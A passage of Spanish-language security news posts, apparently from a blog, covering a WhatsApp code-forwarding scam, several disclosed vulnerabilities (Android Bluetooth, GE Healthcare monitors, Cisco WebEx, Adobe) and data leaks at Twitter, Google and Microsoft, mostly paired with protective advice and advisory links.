En cuanto a medidas de protección que podemos poner a nivel de software, por supuesto contar con una buena solución antimalware instalada nos ayudará mucho para detectar todo tipo de malware.

Y es básico mantener copias de seguridad de todos nuestros archivos, de esta forma, aunque nos pidan un rescate por ella, no tendremos la necesidad de hacerlo: estarán a salvo en nuestro backup.

Engaño solicita reenviar código de verificación para robar cuenta de WhatsApp

Categoría: Seguridad Whatsapp

Estafadores envían un mensaje vía SMS o WhatsApp solicitando que reenvíen un código de seis dígitos, que supuestamente llegó a la potencial víctima por error, para robar las cuentas de WhatsApp.

El martes pasado la Guardia Civil española alertó a través de su cuenta de Twitter sobre un modus operandi que usan los cibercriminales para acceder e incluso robar el acceso a cuentas personales de distintos servicios. Es por eso que me pareció oportuno replicar la alerta y explicar de qué se trata para evitar que los usuarios caigan en este engaño, ya que posiblemente pueda aparecer en Argentina en breve.

Según un comunicado emitido hace aproximadamente una semana por la Guardia Civil, se trata de una campaña de suplantación de identidad que llega a través de WhatsApp y que busca el secuestro de cuentas. Todo comienza con un llamativo mensaje a través de la aplicación de mensajería o de un simple SMS a través del cual un amigo/a (víctima del engaño también) dice que, por error, un código de verificación de seis dígitos (que supuestamente no iba dirigido a ella) se envió a su teléfono y solicita que le reenvíen el mensaje con el código.

Mensaje de WhatsApp que la Guardia Civil publicó a modo de ejemplo.

Dado que es un mensaje que está escrito en español, no sería extraño que comience a circular en América Latina con un texto igual o similar al que se observa en la imagen.

En este caso, como la víctima seguramente no solicitó recientemente recuperar ningún tipo de código podría llegar a creer que el mensaje es genuino y fue enviado por un contacto que sí necesita recuperar el acceso a su cuenta.

Aquí radica el problema de seguridad al que se expone la víctima, ya que los criminales detrás de este engaño lo que están haciendo en realidad es entregar el código de verificación para registrar su cuenta de WhatsApp en otro dispositivo.

Acto seguido, una vez que se reenvía el mensaje con el código de verificación de seis dígitos: el ciberdelincuente detrás de este engaño registrará WhatsApp en otro teléfono con dicho código (y el número telefónico que ya tiene porque aparece en el encabezado del mensaje recibido), mientras la víctima solo verá en su pantalla un mensaje a través del cual se informa que perdió el acceso a su cuenta (hasta aquí momentáneamente).

Mensaje que llega a la víctima una vez que los estafadores registran asocian su número de teléfono a una cuenta de WhatsApp en otro teléfono.

Lo que generalmente ocurre en estos casos es que el cibercriminal rápidamente activará la verificación en dos pasos dentro de WhatsApp, logrando de esta manera que el usuario original e esta cuenta no pueda recuperarla.

Y es precisamente la activación de la verificación en dos pasos el mejor aliado que tienen los usuarios para evitar caer en este tipo de engaño que buscan tomar el control del servicio de mensajería más utilizado actualmente.

Cómo activar la verificación de dos pasos en WhatsApp

El procedimiento para activar de la verificación en dos pasos se realiza de la siguiente manera. Primero accedemos a la sección ajustes en la parte superior derecha de la pantalla de nuestro teléfono.

Primero accedemos a la sección ajustes en la parte superior derecha de la pantalla de nuestro teléfono.
Luego vamos a la sección “Cuenta”
Una vez dentro de “Cuenta” seleccionamos la opción “Verificación en dos pasos”.

En este momento el usuario deberá elegir una contraseña de 6 dígitos, la cual será solicitada la próxima vez que se quiera registrar WhatsApp en cualquier dispositivo. Es posible que, por seguridad, cada cierto tiempo la aplicación solicite el ingreso de la contraseña para evitar lecturas no autorizadas de los mensajes.

Configuración del código Pin de la verificación en dos pasos

Como se observa, de esta manera entonces, la cuenta queda protegida asociada no solo al número telefónico que hizo la instalación, sino a una clave numérica y a una dirección de correo electrónico.

Con estas medidas adicionales, si por algún motivo el usuario desprevenido entregara la clave de registro de WhatsApp, las otras capas de seguridad impedirían que un tercero lo registrase en otro celular.

Tal como he mencionado en artículos anteriores, el doble factor de autenticación (en WhatsApp denominado verificación en dos pasos) sigue siendo el método más seguro para evitar accesos no autorizados a las cuentas.

Este tipo de capa de seguridad se encuentran actualmente en la mayoría de las redes sociales, como en sistemas de correo electrónico más utilizados.

Apagá el Bluetooth – Vulnerabilidad crítica en el Bluetooth de Android

Categoría: Android Seguridad

Google ha lanzado recientemente una actualización que corrige una vulnerabilidad crítica en la implementación Bluetooth de Android. Identificada con el CVE-2020-0022, dicha vulnerabilidad afecta principalmente a dispositivos con las versiones Oreo (8.0 y 8.1) y Pie (9.0) del sistema operativo. La versión 10 no es explotable, pero sí susceptible a un ataque por denegación de servicio.

De acuerdo con la empresa de seguridad IT ERNW, quien ha reportado el problema a Google, tan solo es necesario estar en las proximidades de un dispositivo y conocer su dirección MAC Bluetooth para provocar una ejecución de código arbitrario en el mismo, sin necesidad de interacción alguna por parte del usuario.

La obtención de la dirección MAC Bluetooth del dispositivo que, por defecto, solo es visible a otros dispositivos desde la pantalla de configuración, en ocasiones se puede deducir a partir de la dirección MAC WiFi.

Esta vulnerabilidad puede provocar el robo de datos personales y, potencialmente, servir como pivote para infectar otros terminales cercanos, pudiendo provocar una infección en cadena.

Se recomienda instalar, a la mayor brevedad posible, la última revisión de seguridad publicada por cada fabricante. En caso de no estar disponible aún y, como medida de mitigación, se sugiere desconectar el Bluetooth o, en su defecto, desactivar la visibilidad del dispositivo.

Fuente
https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/
https://source.android.com/security/bulletin/2020-02-01.html

Explotaron fallo en Twitter que permitía vincular números de teléfono con nombres de usuarios

Categoría: Seguridad Twitter

Se trata de un fallo que permitía hacer un uso abusivo de una funcionalidad legítima de Twitter y que estuvo siendo explotado mediante cuentas falsas.

Twitter publicó un comunicado a través de su blog oficial alertando a la comunidad acerca de un incidente de seguridad en el que atacantes explotaron una funcionalidad de la red social que les permitió obtener los números de teléfono asociados a millones de cuentas.

Se trata de una funcionalidad en la sección configuración que permite encontrar a un usuario a través de su número de teléfono, siempre y cuando el contacto tenga activa en su cuenta la opción “permite que las personas que tienen tu número de teléfono puedan encontrarte en Twitter” que vincula su cuenta con su número de teléfono. Cabe aclarar que aquellas personas que no tengan esta opción seleccionada no se vieron afectadas por este incidente.

Si bien la funcionalidad es legítima, el problema fue que no se suponía que alguien subiría una enorme cantidad de números de teléfonos generados de manera aleatoria para hacer un uso abusivo de esta funcionalidad para llegar a perfiles e información de contacto

Twitter tomó conocimiento de este error el pasado 24 de diciembre a partir de un reporte que publicó el sitio TechCrunch en el que un investigador reveló la existencia de este bug que le permitió asociar 17 millones de números de teléfono a cuentas de usuario de Twitter utilizando la app de Twitter para Android. Según explicó en ese momento el investigador, al ingresar un número de teléfono la API te devuelve datos del usuario, aunque cabe aclarar que el error no existe en la plataforma web.

Durante la investigación que realizó la red social luego de tomar conocimiento del problema descubrió la existencia de otras cuentas explotando el mismo error.  Según dijo la red social a ZDNet, encontraron evidencia adicional de que el fallo ha estado siendo explotado por terceros que no tienen relación con el investigador de seguridad que mencionó TechCrunch en su reporte.

Si bien muchas de las cuentas identificadas llevando adelante un comportamiento de esta naturaleza estaban ubicadas en distintos países, un alto volumen de las solicitudes provenía de direcciones IP de países como Irán, Israel y Malasia, por lo que existe la posibilidad de que algunas de estas direcciones IP tengan vinculación con actores que cuentan con el apoyo de un estado-nación, explica Twitter a través del comunicado.

La red social suspendió inmediatamente cada una de las cuentas falsas que identificó explotando este fallo. Asimismo, realizaron una serie de modificaciones luego de detectar los ataques para que no pueda devolver nombres de cuentas específicos para las búsquedas.

Cómo revisar la configuración de privacidad de tu cuenta de Google

Categoría: Google Seguridad

Los usuarios se han vuelto cada vez más sensibles acerca de cómo se manejan sus datos, lo que a su vez significa que las compañías tecnológicas se enfrentan a un escrutinio creciente. Google, por ejemplo, introdujo en los últimos años nuevas funciones de privacidad en un intento por ser más transparente respecto de cómo maneja los datos y devolver el control a las manos de los usuarios.

Una forma sencilla de mejorar la privacidad de su cuenta de Google es utilizar la función de verificación de privacidad. A través de simples pasos, la herramienta le permite administrar sus datos em diversos productos y servicios que brinda la compañía. Por lo tanto, a continuación, nos adentraremos en la revisión de algunos puntos en la configuración de privacidad de su cuenta que pueden resultarle de interés teniendo en cuenta cómo utiliza el buscador, YouTube, Maps u otro de los servicios operados por Google. Tenga en cuenta que el panel de control de su cuenta de Google puede variar según los productos y servicios que utilice.

Actividad web y de aplicaciones

Cuando esta opción está activada, Google guarda su actividad de navegación tanto en su sitio como en sus aplicaciones locales mientras está conectado. Cuando se trata de la web y el navegador web Chrome, la herramienta mantiene un historial bastante completo de las búsquedas realizadas, sitios que ha visitado y sus actividades. Si tiene un teléfono con Android, también registra las aplicaciones con las que ha interactuado, la hora exacta en que lo hizo y cuántas veces las usó durante todo el día.

Google entiende que todo esto es necesario para ofrecer a los usuarios una experiencia más personalizada, como resultados de búsqueda más rápidos y experiencias más inteligentes al usar su conjunto de aplicaciones. Puede desactivarlo por completo, lo que significa que Google no grabará su historial de Chrome (no significa que su ISP no sepa lo que busca), sus actividades, aplicaciones y dispositivos y sus grabaciones de voz y audio. Además, tiene la opción de eliminarlo manualmente o eliminarlo automáticamente cada 3 meses o cada año y medio.

Historial de ubicaciones

Esto parece explicarse por sí mismo, pero si aún tiene dudas, Google creará un mapa de todas las ubicaciones donde ha estado con los dispositivos que utiliza con sus servicios. Tenga en cuenta que, si esta opción está activada, su ubicación se registrará aunque no esté utilizando ningún servicio de Google en ese momento.

Esta característica debería ayudar con las búsquedas de mapas o con sus rutas de viaje. Puede pausar o desactivar la grabación de su historial de ubicaciones en cualquier momento, pero eso no significa que se borren los datos que ya se han recopilado. Eso se deberás hacerlo manualmente, en la línea de tiempo de Google Maps, a menos que desee tener un recuerdo de todos los lugares que ha visitado.

Alternativamente, puede elegir qué dispositivos brindan información sobre su ubicación y cuáles no. Este mapa debe ser accesible solo para ti, a menos que sea comprometido o compartas tu contraseña.

Grabaciones de voz y audio

Si usa el Asistente de Google para simplificar su vida y esta opción está activada, sus comandos de voz se están grabando y guardando. De hecho, también guarda otras entradas de audio, ya que Google usa estas entradas para mejorar su reconocimiento de voz. Puede revisar las mismas en la sección Actividad web y de aplicaciones, por lo que si desea examinar los diferentes comandos y preguntas deberá usar la barra de búsqueda y filtrar los resultados. En cuanto a desactivarlo, puede hacerlo por separado en la sección Controles de actividad.

Historial de YouTube y lo que compartes

Cuando esta opción está activada, Google guarda en este servicio un registro de todos los videos que ve y su historial de búsqueda. Al iniciar sesión, YouTube recuerda dónde dejó de ver videos y, según su historial, ofrece recomendaciones que no se limitan solo a este servicio, sino también a otros servicios de Google.

Puede navegar por su historial, borrarlo e incluso pausar por completo la grabación de sus hábitos de observación. Si esto parece una explicación diluida de cómo funciona el historial de YouTube, puede ver este video explicativo publicado por el Equipo de YouTube.

Una cosa que tendemos a olvidar de YouTube es que no solo es un sitio que usamos para mirar videos, sino también una red social. Por lo tanto, también debe realizar una auditoría de lo que comparte y de lo que otros usuarios pueden ver sobre usted, desde sus suscripciones hasta sus listas de reproducción. También puedes seleccionar tu feed de actividad, lo que significa alternar si cada video que te gusta (excepto los privados, por supuesto) o la lista de reproducción que guardas se publica en tu feed.

Configuraciones de anuncios

El control de configuración de anuncios no permite desactivar los anuncios. En cambio, le permite cambiar los tipos de anuncios que ve en función de sus intereses, edad, sexo y otra información que Google ha acumulado. Esto significa que, si desactiva la personalización de anuncios, obtendrá anuncios generales y no aquellos que puedan despertar su interés. También puede ver más anuncios en los resultados de búsqueda de Google. Si desea limitar la cantidad de anuncios que ve, quizás un complemento para su navegador como adblocker sería una mejor opción.

Controla lo que otros ven de ti

Dependiendo de cuántos campos haya completado en su perfil se mostrarán las opciones que puede editar. Si lo ha mantenido bien cerrado, entonces su perfil puede incluir tan poco como su nombre y fecha de nacimiento (lo cual también es posible ocultar). La opción en la que debe centrarse en esta sección es el segmento de avales compartidas. Si está activado, sus comentarios pueden ser visibles para otros usuarios para promocionar negocios o incluso ser utilizados en anuncios de Google. Debería estar desactivado por defecto, pero vale la pena verificarlo.

En cuanto a las recomendaciones, depende de usted decidir si valora más su privacidad o si está dispuesto a hacer ciertas concesiones por conveniencia. Puede que haya que estudiar un poco el tema hasta encontrar las configuraciones con las que se sienta cómodo, pero valdrá la pena su tiempo. Si olvida revisar la configuración con cierta frecuencia, también está la opción de recibir un recordatorio por correo electrónico para revisar la configuración. Su privacidad es un problema que no debe tomarse a la ligera, y debe auditar su configuración en todos los servicios que utiliza, al menos un par de veces al año.

Recuerde que, una vez hecha esta revisión en su cuenta principal de Google, deberá revisar sistemáticamente esta configuración mientras está conectado a cualquier otra cuenta de Google que use. Además, si navega regularmente por la web sin estar conectado a los servicios de Google, debe revisar esta configuración cuando no esté conectado, y debe hacerlo en todos los navegadores y en todos los dispositivos que use para tales actividades, ya que estas configuraciones están vinculadas a las cookies almacenadas en cada navegador, en lugar de a cada cuenta específica.

Fuente: We Live Security

Falla del software de Google envió videos de algunos usuarios a extraños

Categoría: Google Seguridad

Google ha dicho que un error de software provocó que los videos personales de algunos usuarios fueran enviados por correo electrónico a desconocidos.

La falla afectó a los usuarios de Google Photos que solicitaron exportar sus datos a fines de noviembre. Durante cuatro días, la herramienta de exportación agregó videos por error a archivos de usuarios no relacionados.

Como resultado, los videos privados pueden haber sido enviados a extraños, mientras que los archivos descargados pueden no estar completos.

«Estamos notificando a las personas sobre un error que puede haber afectado a los usuarios que usaron Google Takeout para exportar su contenido de Google Photos entre el 21 y el 25 de noviembre», dijo un portavoz de Google.

«Estos usuarios pueden haber recibido un archivo incompleto o videos, o fotos, que no eran de ellos. Solucionamos el problema subyacente y hemos realizado un análisis en profundidad para ayudar a evitar que esto vuelva a suceder. Lamentamos mucho que esto haya sucedido ”.

La compañía enfatizó que el error solo afectaba a los usuarios de Google Takeout, una herramienta de descarga de datos, y no a los usuarios de Google Photos en general. No dio cifras específicas sobre cuántos usuarios se vieron afectados, pero dijo que era menos del 0.01% de los usuarios de Google Photos.

Google dijo que había informado al comisionado irlandés de protección de datos, que supervisa a la compañía en la UE y tiene el poder de imponer multas de hasta el 4% de la facturación anual por incumplimiento del Reglamento General de Protección de Datos.

Javvad Malik, un defensor de la conciencia de seguridad en KnowBe4, elogió a Google por la velocidad relativa de su respuesta, pero agregó: “Si bien el problema se limitó a que los videos se compartieran incorrectamente al descargar un archivo, es una violación de datos y afectó la privacidad de los usuarios.

“Muchos usuarios confían en los proveedores de la nube, especialmente para fotos y videos que se respaldan automáticamente desde dispositivos móviles. Es imperativo que los proveedores de la nube mantengan esa confianza a través de medidas de seguridad sólidas que permitan a los usuarios restaurar sus datos, al mismo tiempo que garantizan que los datos se mantengan a salvo de fugas accidentales o maliciosas «.

Google Photos ofrece almacenamiento ilimitado de imágenes en la nube, con el compromiso de que Google tiene acceso a las imágenes y puede usarlas para entrenar sus modelos de aprendizaje automático.

Esta semana, la compañía comenzó a probar un servicio en América del Norte en el que los usuarios pueden tener 10 de sus fotos cada mes elegidas algorítmicamente e impresas y publicadas por $ 8 (£ 6.15) por mes.

El lunes, Google reveló sus ganancias trimestrales y reveló por primera vez cuántos ingresos obtiene de la publicidad de YouTube. El sitio para compartir videos recaudó más de $ 1 mil millones al mes el año pasado, dijo Google.

Evitar que Whatsapp nos bloquee el numero por grupos desconocidos

Categoría: Facebook Información Redes Sociales Seguridad Whatsapp

Hace unos días se hizo viral un audio que expone la peligrosidad de los grupos de whatsapp en donde nos agregan sin nuestro consentimiento. A continuación el audio y después daremos una explicación de como evitar esto. No solo para whatsapp sino que hay que tener en cuenta la mayoría de las redes sociales, aplicaciones, etc y como estas ponen en peligro nuestra privacidad.

Audio Viral

En el archivo de audio, el hombre, que no se identifica, advierte sobre la posibilidad de que WhatsApp pueda bloquear el acceso a la aplicación a miembros de grupos que fomentan la pornografía infantil.

El socio de la víctima relató que una noche su amigo fue sumado desde un número de teléfono desconocido, con prefijo de Estados Unidos, a ese grupo de WhatsApp y que cuando se percató de la situación, a la mañana siguiente, se retiró del grupo. Sin embargo, la aplicación ya había bloqueado todas las cuentas que formaban parte del grupo.

«Es una especie de virus que está viniendo ahora y la única forma de evitarlo es anulando la posibilidad de que te puedan sumar a cualquier grupo», dijo el hombre en el mensaje de audio, que incluye una explicación para prevenir situaciones similares.

En octubre, la policía paraguaya emitió un alerta sobre un mensaje similar que circuló en el país guaraní sobre bloqueos.

Desde WhatsApp informan que la empresa tiene «una política de tolerancia cero respecto al abuso sexual infantil».  «Bloqueamos a usuarios de WhatsApp si son parte de grupos que comparten contenido que explota o pone en peligro a niños. WhatsApp utiliza un comprometido equipo que incluye a expertos en la aplicación de la ley y políticas de seguridad en Internet, e investigaciones para supervisar estos esfuerzos», aseguran desde la compañía, propiedad de Facebook.

Para proteger la privacidad y la seguridad de sus usuarios, la compañía «garantiza la encriptación de extremo a extremo en todas las conversaciones, lo que significa que sólo el remitente y el receptor pueden ver el contenido de los mensajes».

Sin embargo, para evitar «la distribución de imágenes de explotación infantil, WhatsApp se apoya en toda la información sin encriptación disponible en la plataforma -incluidos los nombres de los grupos y las denuncias de usuarios- para detectar y prevenir este tipo de abuso».

Por ejemplo, usa una tecnología de comparación de fotos llamada PhotoDNA para escanear fotos de perfiles proactivamente e identificar imágenes de explotación infantil conocidas.

«Si nuestros sistemas detectan alguna de esas imágenes, bloquearemos las cuentas de usuario asociadas dentro de un grupo.», afirman desde la empresa

Por lo tanto, WhatsApp puede bloquear el acceso a la aplicación de usuarios que integren estos grupos. «Aunque no podamos distinguir entre un usuario que envía o que recibe imágenes de explotación infantil, nuestra política de tolerancia cero implica que todos los miembros de un grupo así serán bloqueados de WhatsApp. Cada mes, bloqueamos cientos de miles de cuentas sospechosas de compartir imágenes de explotación infantil», aseguraron desde la empresa.

Santiago Pontiroli, analista de seguridad de la empresa Kaspersky, opina que se trata de una «estafa» y que «no es algo masivo y se califica como una broma».
«Los primeros casos reportados se remontan a octubre del año pasado, tanto en la Argentina como otros países. En estos días ha resurgido este tema», explicó este especialista, quien afirmó que «no existe referencia si es solo un grupo criminal el responsable de esto o si son varios».

Luis Corrons, evangelista de seguridad de la empresa Avast, confirma que «WhatsApp prohíbe las cuentas que considera que han infringido sus condiciones de servicio. En este caso, pertenecer a un grupo que comparte material ilegal supone una violación de los términos de servicio de WhatsApp».

Corrons señala que la aplicación «ha desarrollado sistemas automatizados para mejorar su capacidad de detectar y eliminar a las personas y actividades abusivas que violan sus términos, que establecen que los usuarios no pueden utilizar WhatsApp de forma ilegal, obscena, difamatoria, etc.».

Prevención

¿Cómo puede evitar un usuario que lo agreguen de forma compulsiva a un grupo? «La mejor manera de evitar ser añadido a grupos no solicitados es controlar quién está autorizado para agregarle a grupos a través de los ajustes de la plataforma».

Para ello se debe ir a Ajustes, luego ingresar en Cuenta > Privacidad > Grupos y seleccionar una de las tres opciones: «Todos», «Mis contactos» o «Mis contactos, excepto..».

* «Mis contactos» significa que sólo los usuarios que tenga en su lista de contactos telefónicos pueden agregarle a grupos.

* «Mis contactos, excepto…» permite un control adicional sobre quién de entre sus contactos puede sumarle a un grupo. En esos casos, al administrador que no pueda agregarle a un grupo se le indicará que le envíe un mensaje privado de invitación por medio de una conversación individual, lo que permitirá que el usuario decida si quiere sumarse al grupo o no. Tendrá tres días para aceptar la invitación antes de que venza. Estas características dan a los usuarios más controles sobre los mensajes de grupos que reciben.

Lo mas importante en estos momentos de mundo virtual en donde nuestra información esta altamente expuesta es tomar los recaudos necesarios.
Si usted tiene alguna duda, consulta o sugerencia comente en la nota y responderemos a la brevedad.

Expuestos 250 millones de registros de asistencia al cliente de Microsoft

Categoría: Seguridad Windows

Si se ha puesto en contacto con Microsoft para solicitar asistencia técnica en los últimos 14 años, su consulta técnica, junto con alguna información personal identificable, puede haber estado en peligro.

Microsoft ha admitido hoy un incidente de seguridad que ha puesto al descubierto casi 250 millones de registros de «Servicio y soporte técnico al cliente» en Internet debido a un servidor mal configurado que contiene registros de conversaciones entre su equipo de soporte técnico y los clientes.

De acuerdo con Bob Diachenko, el investigador de seguridad que detectó el problema e informó a Microsoft, la base de datos desprotegida contenía registros desde 2005 hasta diciembre de 2019.

En una entrada de blog, Microsoft confirmó que debido a la mala configuración de las reglas de seguridad añadidas al servidor en cuestión el 5 de diciembre de 2019, se permitió la exposición de los datos. El servidor permaneció en ese estado hasta que los ingenieros corrigieron la configuración el 31 de diciembre de 2019.

Microsoft también comunicó que la base de datos se construyó utilizando herramientas automatizadas para eliminar la información que identificaba de forma personal a la mayoría de los clientes, excepto en algunos escenarios, en los que dicha información no cumplía el formato estándar.

«Nuestra investigación confirmó que la gran mayoría de los registros fueron eliminados de la información personal, de acuerdo con nuestras prácticas estándar», dijo Microsoft.

Sin embargo, según Diachenko, muchos registros de la base de datos filtrada contenían datos legibles sobre los clientes, incluyendo:

· Direcciones de correo electrónico
· Direcciones IP
· Localizaciones
· Descripciones de las reclamaciones y casos de CSS
· Correos electrónicos del agente de soporte técnico de Microsoft
· Números de casos, resoluciones y observaciones
· Notas internas marcadas como "confidenciales"

«Este problema era específico de una base de datos interna utilizada para el análisis de casos de soporte y no representa una exposición de nuestros servicios comerciales en la nube«, dijo Microsoft.

Al tener a mano información real de casos sensibles y direcciones de correo electrónico de los clientes afectados, los datos filtrados podrían ser objeto de abuso por parte de estafadores de soporte técnico para engañar a los usuarios y hacerles pagar por problemas informáticos inexistentes, haciéndose pasar por representantes de soporte de Microsoft.

«La ausencia de información de identificación personal es irrelevante aquí, dado que los registros de soporte técnico frecuentemente exponen a los clientes VIP, sus sistemas internos y configuraciones de red, e incluso las contraseñas. Los datos son una mina de oro para los criminales pacientes que buscan atacar las grandes organizaciones y los gobiernos», dijo el director de operaciones de ImmuniWeb Ekaterina Khrustaleva a The Hacker News.

«Peor aún, muchas grandes empresas y no sólo Microsoft han perdido la visibilidad de su superficie de ataque externo, exponiendo a sus clientes y socios a riesgos significativos. Es probable que veamos una multitud de incidentes similares en 2020».

Un trabajador de Microsoft, Roger Grimes, compartió:

«Habiendo trabajado para Microsoft durante 15 años, 11 años como empleado a tiempo completo, he visto de primera mano lo mucho que tratan de luchar contra escenarios como éste. Hay múltiples capas de control y educación diseñadas para evitar que esto suceda. Y te muestra lo difícil que es prevenirlo el 100% del tiempo. Nada es perfecto. Los errores y las fugas ocurren. Las organizaciones tienen permisos demasiado permisivos. ¡Todas! Es sólo cuestión de si alguien fuera de la organización lo descubre o si alguien se aprovecha de ello».

«En este caso, por muy malo que sea, fue descubierto por alguien que no hizo cosas maliciosas con él. Claro que los datos, al estar desprotegidos, también podrían haber sido utilizados por los malos, pero hasta ahora nadie ha planteado ese caso ni ha aportado pruebas de que haya sido utilizado de forma maliciosa», añadió Grimes.

«Cualquiera puede cometer un error. La pregunta más importante es cómo ocurrió el error y cómo evitar que ocurra la próxima vez y si pudo haber ocurrido algún otro en las mismas circunstancias».

Como resultado de este incidente, la compañía comunicó que comenzó a notificar a los clientes afectados cuyos datos estaban presentes en la base de datos expuesta de Servicio y Soporte al Cliente.

Más información:
Comunicado de Microsoft
https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/
Comparitech
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
The Hacker News
https://thehackernews.com/2020/01/microsoft-customer-support.html

Varias vulnerabilidades críticas encontradas en sistemas médicos de GE healthcare

Categoría: Seguridad

La Agencia de Seguridad DHS ha informado de seis vulnerabilidades de clasificación crítica en varios dispositivos médicos de GE.

En el documento informativo ICSMA-20-023-01 vemos que la lista de dispositivos afectados se resume a los siguientes: los servidores de telemetría GE CARESCAPE y ApexPro, la estación central CARESCAPE (CSCS), los sistemas del Centro de información clínica (CIC) y los monitores CARESCAPE B450, B650, B850.

Entre las vulnerabilidades descubiertas se incluyen el almacenamiento desprotegido de credenciales, validación de entrada incorrecta, Utilización de credenciales en texto plano en el código de la aplicación, falta de autenticación para funciones crítica, subida de archivos sin restricciones en el tipo de archivo y cifrados inadecuados o débiles.

GE Comenta que por el momento no se ha reportado ningún incidente de ataque en los que se aproveche estas nuevas vulnerabilidades.

Los fallos son:

  • CVE-2020-6961, nivel crítico, podría permitir a un atacante obtener acceso a la clave privada SSH en los archivos de configuración.
  • CVE-2020-6962, nivel crítico, es una vulnerabilidad de validación de entrada en la utilidad de configuración del sistema basada en la web que podría permitir a un atacante obtener la ejecución arbitraria de código remoto.
  • CVE-2020-6963, nivel crítico, donde los productos afectados utilizan credenciales SMB expuestas en texto plano en el código de la aplicación, lo que puede permitir que un atacante ejecute código arbitrario de forma remota si se explota.
  • CVE-2020-6964, nivel crítico, donde el servicio integrado para el cambio de teclado de los dispositivos afectados podría permitir a los atacantes obtener acceso con un teclado remoto sin autenticación a través de la red.
  • CVE-2020-6965, nivel crítico, es una vulnerabilidad en el mecanismo de actualización de software que permite a un atacante autenticado cargar archivos arbitrarios en el sistema a través de un paquete de actualización.
  • CVE-2020-6966, nivel crítico, los productos afectados utilizan un esquema de cifrado débil para el control de escritorio remoto, que puede permitir que un atacante obtenga la ejecución remota de código de dispositivos en la red.

GE está en el proceso de desarrollar y lanzar parches para estos problemas. Mientras tanto, la compañía recomienda:

  • Aislar las redes MC e IX y,en caso de necesitar conectividad fuera de las redes MC y/o IX, utilizar un router/firewall.
  • El router/firewall debería configurarse para bloquear todo el tráfico entrante iniciado desde fuera de la red, con la excepción de los flujos de datos clínicos necesarios.
  • Restringir el acceso físico a estaciones centrales, servidores de telemetría y las redes MC e IX. Además de cambiar la contraseña por defecto de Webmin.
  • Se siguen las mejores prácticas de gestión de contraseñas.
  • La mejor manera de eliminar las vulnerabilidades es encontrarlas lo antes posible utilizando un ciclo de vida de desarrollo seguro (SDLC). En cada etapa del desarrollo del producto, se identifican y erradican dichas vulnerabilidades.

Más información:

Us Cert
https://www.us-cert.gov/ics/advisories/icsma-20-023-01

GE Healthcare
https://www.gehealthcare.com/security

SC Magazine
https://www.scmagazine.com/home/health-care/critical-vulnerabilities-found-in-ge-medical-gear/

Fallo en Cisco WebEx permitiría el acceso a reuniones privadas

Categoría: Seguridad

Cisco Systems ha solucionado una vulnerabilidad de alta gravedad en su popular plataforma de videoconferencia WebEx que podría permitir la intervención de extraños en reuniones privadas protegidas por contraseña, sin necesidad de autentificación.

WebEx es un popular servicio que permite realizar reuniones en línea como si se llevaran a cabo de forma presencial, con la posibilidad de compartir documentos, ofrecer presentaciones, mostrar productos y servicios, etc. así como realizar grabaciones de las mismas.

Se ha hecho publico un fallo de seguridad en Cisco WebEx que podría permitir que un atacante remoto no autentificado ingresase en una reunión de videoconferencia protegida con contraseña. El problema se debe a la exposición involuntaria de información de la reunión en un flujo de unión a la reunión que es específico para aplicaciones móviles. Por tanto los únicos requisitos para poder aprovechar la vulnerabilidad son conocer la ID o URL de la reunión y disponer de la aplicación WebEx para los sistemas móviles iOS o Android.

Los asistentes no autorizados serían visibles en la lista de asistentes de la reunión como asistentes móviles, con lo cual su presencia podría ser detectada por otros participantes de la reunión. Sin embargo, si estos pasasen desapercibidos o no levantasen sospechas entre el resto de asistentes, podría suponer la revelación de cualquier tipo de información sensible que se compartiese en la reunión privada.

La vulnerabilidad, identificada como CVE-2020-3142 y con una puntuación CVSS de 7.5 sobre 10 debido a la facilidad de explotación, fue descubierta internamente durante la resolución de un caso de soporte de Cisco TAC. El equipo de respuesta a incidentes de seguridad de productos de Cisco (PSIRT) ha declarado no tener constancia de ningún anuncio público o explotación de la vulnerabilidad.

Se encuentran afectados los sitios de Cisco WebEx Meetings Suite en versiones anteriores a 39.11.5 y los sitios de Cisco WebEx Meetings Online en versiones anteriores a 40.1.3.

Aunque Cisco ha corregido esta vulnerabilidad y no se requiere interacción del usuario para la actualización, resulta recomendable verificar que la plataforma Cisco Webex utilizada se encuentre actualizada. Para ello se pueden seguir los siguientes pasos:

  • Iniciar sesión en el sitio de Cisco WebEx Meetings Suite o en el sitio de Cisco WebEx Meetings Online.
  • Navegar a Descargas en el lado izquierdo de la página.
  • Colocar el cursor sobre la i junto a «Información de la versión».
  • Verificar el valor que se muestra junto a la versión de la página.

Más información:
Cisco WebEx Meetings Suite and Cisco WebEx Meetings Online Unauthenticated Meeting Join Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200124-webex-unauthjoin

CVE-2020-3142 Detail
https://nvd.nist.gov/vuln/detail/CVE-2020-3142

Adobe lanza parches para 9 vulnerabilidades

Categoría: Seguridad

El pasado 14 de enero Adobe publicó actualizaciones de software para corregir un total de 9 vulnerabilidades en dos de sus aplicaciones más usadas: Adobe Experience Manager y Adobe Illustrator

Cinco vulnerabilidades críticas

Cinco de las nueve vulnerabilidades dadas a conocer son críticas (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714), y todas ellas afectan a las versiones 24.0 y anteriores de Adobe Illustrator CC. Dichas fallos de seguridad fueron reportados a la compañía por el investigador Honggang Ren, de Laboratorios FortiGuard de Fortinet.

Según Adobe, los cinco fallos críticos en Adobe Illustrator se basan en bugs de corrupción de memoria que podrían permitir a un atacante ejecutar código remoto en los sistemas afectados en el contexto del usuario con el que se haya iniciado sesión. Este tipo de fallos tienen lugar cuando el contenido de la memoria se modifica debido a errores en programación, permitiendo la ejecución de código remoto.

Vulnerabilidades en Adobe Experience Manager

Las otras cuatro vulnerabilidades afectan a Adobe Experience Manager -una aplicación para marketing online y análisis web-, ninguna de las cuales son críticas pero deberían ser parcheadas lo antes posible.

Adobe ha marcado las actualizaciones de seguridad para Adobe Experience Manager con una prioridad de nivel 2, lo que quiere decir que se han visto fallos similares siendo explotados en el pasado, pero hasta el momento, la compañía no ha encontrado evidencia alguna de que las vulnerabilidades aquí reportadas hayan sido explotadas «in the wild».

Algunos de los vectores de ataque mediante los cuales explotar estas vulnerabilidades son:

  • Cross-site scripting reflejado (CVE-2019-16466 y CVE-2019-16467). Afecta a las versiones 6.3, 6.4 y 6.5. Este tipo de fallos permite al atacante usar una aplicación web para enviar código malicioso al usuario víctima.
